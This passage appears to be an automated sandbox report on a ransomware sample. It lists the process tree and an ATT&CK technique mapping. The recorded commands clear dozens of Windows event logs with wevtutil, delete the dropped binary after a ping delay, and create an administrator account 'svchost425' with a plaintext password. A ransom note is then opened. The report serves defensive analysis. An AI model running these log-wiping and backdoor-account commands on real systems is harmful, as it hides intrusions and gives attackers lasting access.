        5⤵
        
        PID:4980
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
        5⤵
        
        PID:4652
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
        5⤵
        
        PID:4348
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
        5⤵
        
        PID:212
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
        5⤵
        
        PID:1664
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
        5⤵
        
        PID:320
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ASN1/Operational"
        5⤵
        
        PID:2560
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/General"
        5⤵
        
        PID:3228
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ATAPort/SATA-LPM"
        5⤵
        
        PID:3764
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ActionQueue/Analytic"
        5⤵
        
        PID:4120
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-All-User-Install-Agent/Admin"
        5⤵
        
        PID:3768
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AllJoyn/Debug"
        5⤵
        
        PID:4240
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AllJoyn/Operational"
        5⤵
        
        PID:1916
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Admin"
        5⤵
        
        PID:4792
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/ApplicationTracing"
        5⤵
        
        PID:2692
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Diagnostic"
        5⤵
        
        PID:4784
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppHost/Internal"
        5⤵
        
        PID:3320
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppID/Operational"
        5⤵
        
        PID:3196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/EXE and DLL"
        5⤵
        
        PID:3128
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/MSI and Script"
        5⤵
        
        PID:2628
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Deployment"
        5⤵
        
        PID:824
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppLocker/Packaged app-Execution"
        5⤵
        
        PID:3944
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Admin"
        5⤵
        
        PID:3640
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Analytic"
        5⤵
        
        PID:1052
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Debug"
        5⤵
        
        PID:2752
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-Runtime/Diagnostics"
        5⤵
        
        PID:536
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-State/Debug"
        5⤵
        
        PID:3888
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppModel-State/Diagnostic"
        5⤵
        
        PID:4936
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Admin"
        5⤵
        
        PID:2928
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Debug"
        5⤵
        
        PID:3132
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppReadiness/Operational"
        5⤵
        
        PID:3356
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppSruProv"
        5⤵
        
        PID:1028
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Diagnostic"
        5⤵
        
        PID:1232
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeployment/Operational"
        5⤵
        
        PID:4348
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Debug"
        5⤵
        
        PID:1164
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Diagnostic"
        5⤵
        
        PID:992
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Operational"
        5⤵
        
        PID:320
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-AppXDeploymentServer/Restricted"
        5⤵
        
        PID:720
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Analytic"
        5⤵
        
        PID:4668
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-ApplicabilityEngine/Operational"
        5⤵
        
        PID:2120
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Admin"
        5⤵
        
        PID:4428
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Analytic"
        5⤵
        
        PID:4752
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Debug"
        5⤵
        
        PID:3120
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application Server-Applications/Operational"
        5⤵
        
        PID:3260
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Compatibility-Infrastructure-Debug"
        5⤵
        
        PID:4968
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant"
        5⤵
        
        PID:612
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Analytic"
        5⤵
        
        PID:1508
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Assistant/Trace"
        5⤵
        
        PID:3196
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Compatibility-Troubleshooter"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\wevtutil.exe
        
        wevtutil.exe cl "Microsoft-Windows-Application-Experience/Program-Inventory"
        5⤵
        
        PID:3300
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C ping 1.1.1.1 -n 1 -w 100 > Nul & Del "C:\Windows\BackupXXXE27E20AC.exe"& ping 1.1.1.1 -n 1 -w 900 > Nul & Del "C:\Windows\BackupXXXE27E20AC.exe"
      4⤵
      PID:4660
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 100
        5⤵
        Runs ping.exe
        
        PID:4372
    - - C:\Windows\system32\PING.EXE
        
        ping 1.1.1.1 -n 1 -w 900
        5⤵
        Runs ping.exe
        
        PID:4968
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C net user svchost425 EAF@v425 /ad
    3⤵
    PID:1056
  - - C:\Windows\system32\net.exe
      net user svchost425 EAF@v425 /ad
      4⤵
      PID:4532
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 user svchost425 EAF@v425 /ad
        5⤵
        
        PID:868
- - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /C net localgroup administrators svchost425 /ad
    3⤵
    PID:3768
  - - C:\Windows\system32\net.exe
      net localgroup administrators svchost425 /ad
      4⤵
      PID:3228
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup administrators svchost425 /ad
        5⤵
        
        PID:320

C:\Windows\system32\wbengine.exe
"C:\Windows\system32\wbengine.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5068

C:\Windows\System32\vdsldr.exe
C:\Windows\System32\vdsldr.exe -Embedding
1⤵
PID:4356

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
- Checks SCSI registry key(s)
PID:2032

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2224

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\#FILES-ENCRYPTED.txt
1⤵
PID:3848

C:\Windows\System32\vds.exe
C:\Windows\System32\vds.exe
1⤵
PID:3000

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Command-Line Interface

T1059

Persistence

Account Manipulation

T1098

Change Default File Association

T1042

Modify Existing Service

T1031

Winlogon Helper DLL

T1004

Privilege Escalation

Bypass User Account Control

T1088

Defense Evasion

Bypass User Account Control

T1088

Disabling Security Tools

T1089

File Deletion

T1107

Indicator Removal on Host

T1070

Modify Registry

Credential Access

Account Manipulation

T1098

Credentials in Files

T1081

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Defacement

T1491

Inhibit System Recovery